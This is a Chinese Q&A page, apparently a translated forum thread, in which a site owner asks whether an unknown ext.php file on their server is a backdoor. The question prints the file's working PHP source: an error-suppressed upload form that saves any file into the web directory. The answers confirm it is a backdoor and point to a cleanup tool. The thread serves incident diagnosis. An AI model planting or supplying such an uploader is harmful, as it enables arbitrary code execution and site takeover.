这个ext.php是后门脚本吗?

时间:2014-12-29 17:41:37

标签: php

我正在查看我的某个网站的服务器,我注意到一个我无法识别的文件(过去曾在服务器上工作的其他人上传过的文件)

该文件是一个名为ext.php的php文件,并且满足了一个用于上传文件的表单

<?php 
error_reporting(0);
@ini_set("display_errors", 0);
$var= $_SERVER['PHP_SELF']."?";
$form ='<form enctype="multipart/form-data" action="'.$var.'" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';
if (!empty($_FILES['uploadFile'])) {
$self=dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
$time=filemtime($self);print "OK";
} else { print $form; } ?>

这是一个潜在的后门黑客剧本吗?上面的代码究竟做了什么?我试图诊断问题,并确定此脚本可能造成的潜在损害。

2 个答案:

答案 0 :(得分:0)

是的,任何人都可以上传&#34; somescritpt.php&#34;进入您的网站,它将使用网站上的任何代码的特权执行。所以它是后门。

答案 1 :(得分:0)

即使回答这个问题,这是我创建的代码,用于从后门恶意软件中清除多个站点服务器。即使有一些备份,也有太多1000个带垃圾代码的文件,值得写一个更干净的脚本。

有关更多信息,请查看GitHub上的Narnia Guardian

这不是包含代码的完整答案,因为它跨越多个文件。如果你深入了解它是如何工作的(它很快),它可以避免很多麻烦,你可以成为当天的英雄,他们在几分钟内恢复了糟糕的服务器。